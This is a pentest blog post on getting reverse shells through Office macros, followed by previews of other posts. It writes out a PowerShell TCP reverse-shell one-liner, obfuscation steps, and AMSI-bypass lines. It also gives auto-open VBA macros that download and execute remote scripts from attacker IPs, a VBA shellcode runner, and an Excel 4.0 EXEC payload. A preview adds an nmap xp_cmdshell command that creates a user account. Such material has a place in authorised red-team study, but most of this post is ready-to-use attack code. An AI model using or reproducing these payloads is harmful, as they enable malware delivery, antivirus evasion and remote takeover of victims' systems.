Skip to main content

Office Macro's Reverse Shells


 

Obfuscate the Powershell code

#Powershell one-Liner
$client = New-Object System.Net.Sockets.TCPClient('10.10.14.133',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()


#save the above rev-shell to a file; rev.txt

#Download Invoke-Obfuscation
Import-Module ./Invoke-Obfuscation.psd1
Invoke-Obfuscation

Output:


Choose one of the below options:

[*] TOKEN Obfuscate PowerShell command Tokens
[*] AST Obfuscate PowerShell Ast nodes (PS3.0+)
[*] STRING Obfuscate entire command as a String
[*] ENCODING Obfuscate entire command via Encoding
[*] COMPRESS Convert entire command to one-liner and Compress
[*] LAUNCHER Obfuscate command args w/Launcher techniques (run once at end)

Invoke-Obfuscation> token
Choose one of the below Token options:

[*] TOKEN\STRING Obfuscate String tokens (suggested to run first)
[*] TOKEN\COMMAND Obfuscate Command tokens
[*] TOKEN\ARGUMENT Obfuscate Argument tokens
[*] TOKEN\MEMBER Obfuscate Member tokens
[*] TOKEN\VARIABLE Obfuscate Variable tokens
[*] TOKEN\TYPE Obfuscate Type tokens
[*] TOKEN\COMMENT Remove all Comment tokens
[*] TOKEN\WHITESPACE Insert random Whitespace (suggested to run last)
[*] TOKEN\ALL Select All choices from above (random order)

Invoke-Obfuscation\Token> All

Choose one of the below Token\All options to APPLY to current payload:

[*] TOKEN\ALL\1 Execute ALL Token obfuscation techniques (random order)


Invoke-Obfuscation\Token\All> SET SCRIPTPATH ./rev.txt

Successfully set ScriptPath:
./rev.txt

Choose one of the below Token\All options to APPLY to current payload:

[*] TOKEN\ALL\1 Execute ALL Token obfuscation techniques (random order)


Invoke-Obfuscation\Token\All> 1

[*] Obfuscating 3 String tokens.

[*] Obfuscating 11 Member tokens.

[*] Obfuscating 2 Type tokens.

[*] Obfuscating 23 Variable tokens.

[*] Obfuscating 2 Argument tokens.

[*] Obfuscating 7 Command tokens.

Executed:
CLI: Token\All\1
FULL: Out-ObfuscatedTokenCommand -ScriptBlock $ScriptBlock


save the output to a file 
AMSI Bypass 

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )


[Ref].Assembly.GetType(“System.Management.Automation.AmsiUti”+“ls”).GetField(“amsiInitF”+“ailed”,‘NonPublic,Static’).SetValue($null,$true)
Method-1 

Private Sub Workbook_Open()
Shell ("p" & "o" & "w" & "e" & "r" & "s" & "h" & "e" & "l" & "l" & "." & "e" & "x" & "e I" & "E" & "X ((" & "n" & "e" & "w-o" & "bj" & "ect net.we" & "bcli" & "ent).d" & "ownl" & "oa" & "ds" & "tring('http://10.10.10.10/obf.ps1'))")
End Sub
Method - II 

use VBA reverse shell
Method - III

#Download powershell script and run it via VBA

Sub MyMacro()
Dim str As String
str = "powershell (New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/run.ps1') | IEX"
Shell str, vbHide
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
Method - IV

#VBA Shellcode Runner

Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr

Function MyMacro()
Dim buf As Variant
Dim addr As LongPtr
Dim counter As Long
Dim data As Long
Dim res As Long

buf = Array(232, 130, 0, 0, 0, 96, 137, 229, 49, 192, 100, 139, 80, 48, 139, 82)

addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)

For counter = LBound(buf) To UBound(buf)
data = buf(counter)
res = RtlMoveMemory(addr + counter, data, 1)
Next counter

res = CreateThread(0, 0, addr, 0, 0, 0)
End Function

Sub Document_Open()
MyMacro
End Sub

Sub AutoOpen()
MyMacro
End Sub
Method -V

#Open a excel sheet
#right click on the sheet --> Select Macro 4.0 --> new macro sheet is created
#rename A1 to auto_open
#and add the below command in A1
=EXEC("powershell -c IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/obf.ps1')")


Method - VI 

use Spoofing Office Macro

 

 

 

 

 

 

Comments

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds

Windows Priv Escallation

1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm

Forensics & Crypto

Online Decoder --> https://2cyr.com/decode/ Encoding errors -->  https://ftfy.now.sh/ File Signatures List -->  Click here PCAP Analysis: -->  https://www.packettotal.com/ Online Cipher Decryptors: CyberChef  - Cipher Decoder   Crack Station-Hash Cracke r Decrypt Any Kind of Hash 1)  Cipher Statistics 2)  Index of Coincidence Calculator - Online IC Cryptanalysis Tool 3)  Tools List (Awesome and Fantastic Tools) Available on dCode 4)  Solve an Aristocrat or Patristocrat 5)  RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data 5-1)  RSA - Find PQ using N 6)  BertNase's Own Hide content in a Image made of blocks - npiet fun! 7)  Vigenere Solver - www.guballa.de 8)  Fernet (Decode) 9)  Unicode Text Steganography Encoders/Decoders 10)  All in ONE encoders and Decoders Tool 11) Cryptii - Decoder Image Forensics: 1)  Forensically, free online photo forensics tools - 29a.ch 2)  StegSolve to decryt data in